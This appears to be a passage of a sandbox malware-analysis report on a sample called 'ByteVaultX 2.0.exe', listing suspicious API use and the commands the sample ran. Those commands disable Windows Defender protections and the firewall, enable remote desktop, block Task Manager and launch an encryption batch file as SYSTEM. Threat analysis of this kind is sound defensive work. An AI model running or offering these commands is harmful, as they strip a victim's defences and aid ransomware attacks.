N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1568 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
PID 1568 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
PID 1212 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\netsh.exe
PID 1212 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\netsh.exe
PID 1212 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\runas.exe
PID 1212 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\runas.exe
PID 1212 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1212 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 1636 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 1636 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1212 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\system32\cmd.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 4932 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 5036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 5036 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2620 wrote to memory of 1760 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\SYSTEM32\runas.exe

runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffad6a43cb8,0x7ffad6a43cc8,0x7ffad6a43cd8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,12510320699629500330,7879721223763014360,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1820 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,12510320699629500330,7879721223763014360,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,12510320699629500330,7879721223763014360,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,12510320699629500330,7879721223763014360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,12510320699629500330,7879721223763014360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,12510320699629500330,7879721223763014360,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4608 /prefetch:8

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

